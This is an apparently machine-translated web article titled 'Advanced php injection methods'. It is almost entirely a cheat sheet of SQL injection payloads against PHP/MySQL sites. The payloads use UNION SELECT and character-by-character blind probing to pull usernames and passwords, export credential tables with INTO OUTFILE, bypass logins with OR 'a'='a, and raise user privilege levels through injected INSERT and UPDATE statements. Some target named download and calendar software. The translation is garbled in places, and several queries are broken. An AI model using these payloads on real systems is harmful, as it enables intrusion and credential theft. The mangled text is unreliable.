Advanced php injection methods

Both black friends and programmers need to understand both black friends and programmers.

'% 23' and passWord = 'mypass id =-1 union select 1, 1 id =-1 union select char (97), char (97), char (97) id = 1 union select 1, 1 from members id = 1 union select 1, 1 from admin id = 1 union select 1, 1, 1 from user userid = 1 and password = mypass userid = 1 and mid (password, 112) = char () userid = 1 and mid (password,) = char (97) and ord (mid (password, 111)> (the ord function is very useful and can return an integer) 'and LENGTH (password) = '6 (LENGTH of the probe password )' And LEFT (password, 1) = 'm' and LEFT (password, 2) = 'My .............................. And so on, 'Union select 1, username, password from user/* 'union select 1, username, password from user/* = 'Union select 1, username, password from user/* (can be 1 or = directly followed) 99999 'Union select 1, username, password from user/* 'into outfile' c:/file.txt (export file) = 'or 1 = 1 into outfile 'C:/file.txt 1' union select 1, username, password from user into outfile 'C: /user.txt select password FROM admins where login = 'John' INTO dumpfile'/path/to/site/file.txt 'id = 'Union select 1, username, password from user into outfile id =-1 union select 1, database (), version () (flexible application query)

Commonly used query test statement,

select * FROM table where 1=1  select * FROM table where 'uuu'='uuu'  select * FROM table where 1<>2  select * FROM table where 3>2  select * FROM table where 2<3  select * FROM table where 1  select * FROM table where 1+1  select * FROM table where 1--1  select * FROM table where ISNULL(NULL)  select * FROM table where ISNULL(COT(0))  select * FROM table where 1 IS NOT NULL  select * FROM table where NULL IS NULL  select * FROM table where 2 BETWEEN 1 AND 3  select * FROM table where 'b' BETWEEN 'a' AND 'c'  select * FROM table where 2 IN (0,1,2)  select * FROM table where CASE WHEN 1>0 THEN 1 END

For example, the night cat download system version 1.0

Id = 1 union select, 1 union select,, 1 from ymdown_user union select, 1 from ymdown_user where id = 1 id = 10000 union select, 1 from ymdown_user where id = 1 and groupid = 1 union select 1, username, 1, password, 1 from ymdown_user where id = 1 (replace ) Union select, 1 from ymdown_user where id = 1 and ord (mid (password, 1, 1) = 49 (verify the first password) union select 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from ymdown_user where id = 1 and ord (mid (password,) = 50 (second) union select, 1, 1, 1, 1 from ymdown_user where id = 1 and ord (mid (password, 3, 1 )) = 51 ..................................................................

Example 2: gray track transformation id test (meteor)

union%20(select%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_events%20where%20eventid%20=%2013)%20order%20by%20eventdate  union%20(select%20allowsmilies,public,userid,'0000-0-0',pass(),version()%20FROM%20calendar_events%20where%20eventid%20=%2010)%20order%20by%20eventdate

Construction statement:

Select allowsmilies, public, userid, eventdate, event, subject FROM calendar_events where eventid = 1 union (select 1, 1, 1, 1, 1 from user where userid = 1) select allowsmilies, public, userid, eventdate, event, subject FROM calendar_events where eventid = 1 union (select, username, password from user where userid = 1) union % 20 (select % 201,0, 2, '1970-01-01 ', 'A', password % 20 FROM % 20 user % 20 where % 20 userid % 20 = % 20 5) % 20 order % 20by % 20 eventdate union % 20 (select % ,,0, 12695, '2017-01-01 ', 'A ', password % 20 FROM % 20 user % 20 where % 20 userid = 13465) % 20 order % 20by % 20 eventdate union % 20 (select % ,,0, 12695, '2017-01-01 ', 'A', userid % 20 FROM % 20 user % 20 where % 20 username = 'sandlile') % 20 order % 20by % 20 eventdate (check the sand id) (select a FROM table_name where a = 10 and B = 1 ORDER BY a LIMIT 10) select * FROM article where articleid = '$ ID' union select * FROM ...... (When fields are the same as databases, you can directly submit them.) select * FROM article where articleid = '$ ID' union select, 1 FROM ...... (In different cases)

Special tips: write in forms, search engines, and other places:

"___"". _ "" % 'Order BY articleid/* % 'Order BY articleid # _ 'Order BY articleid/* _ 'order by articleid # $ command = "dir c: \ "; system ($ command ); select * FROM article where articleid = '$ ID' select * FROM article where articleid = $ id 1' and 1 = 2 union select * from user where userid = 1/* changes (select * FROM article where articleid = '1' and 1 = 2 union select * from user where userid = 1 /*') 1 and 1 = 2 union select * from user where userid = 1

Statement format: create a database, insert:

create DATABASE `injection`  create TABLE `user` (  `userid` int(11) NOT NULL auto_increment,  `username` varchar(20) NOT NULL default '',  `password` varchar(20) NOT NULL default '',  PRIMARY KEY (`userid`)  ) ;  insert INTO `user` VALUES (1, 'swap', 'mypass');

Insert as a registered user:

insert INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1');  "insert INTO membres (login,password,nom,email,userlevel) VALUES ('$login','$pass','$nom','$email','1')";  insert INTO membres (login,password,nom,email,userlevel) VALUES ('','','','','3')#','1')  "insert INTO membres SET login='$login',password='$pass',nom='$nom',email='$email'";  insert INTO membres SET login='',password='',nom='',userlevel='3',email=''  "insert INTO membres VALUES ('$id','$login','$pass','$nom','$email','1')";  update user SET password='$password', homepage='$homepage' where id='$id'  update user SET password='MD5(mypass)' where username='admin'#)', homepage='$homepage' where id='$id'  "update membres SET password='$pass',nom='$nom',email='$email' where id='$id'";  update membres SET password='[PASS]',nom='',userlevel='3',email=' ' where id='[ID]'  "update news SET Votes=Votes+1, score=score+$note where idnews='$id'";

Extended functions:

DATABASE()  USER()  SYSTEM_USER()  SESSION_USER()  CURRENT_USER()

For example:

Update article SET title = $ title where articleid = 1 corresponding function update article SET title = DATABASE () where id = 1 # update the current database name to the title field update article SET title = USER () where id = 1 # update the current mysql User name to the title field update article SET title = SYSTEM_USER () where id = 1 # update the current MySQL User name to the title field update article SET title = SESSION_USER () where id = 1 # update the current MySQL User name to the title field update article SET title = CURRENT_USER () where id = 1 # update the username verified for the current session to the title field :: :::::::::::::::::::::::::::::::::::::::: ::::::::::::::::::::::::::::::::: $ req = "select * FROM membres where name like '% $ search %' order by name "; select * FROM membres where name like '%' order by uid # % 'Order BY name select uid FROM admins where login = ''OR 'a' = 'a' AND password ='' OR 'a' = 'a' (Classic) select uid FROM admins where login = ''OR admin_level = 1 # 'AND password = ''select * FROM table where msg like' % hop 'select uid FROM membres where login = 'Bob 'AND password like 'a %' # 'AND password = ''select * FROM membres where name like' % 'order by uid # % 'Order BY name

The above is the content of the advanced php injection method highlights _ php skills. For more information, please follow the PHP Chinese network (www.php1.cn )!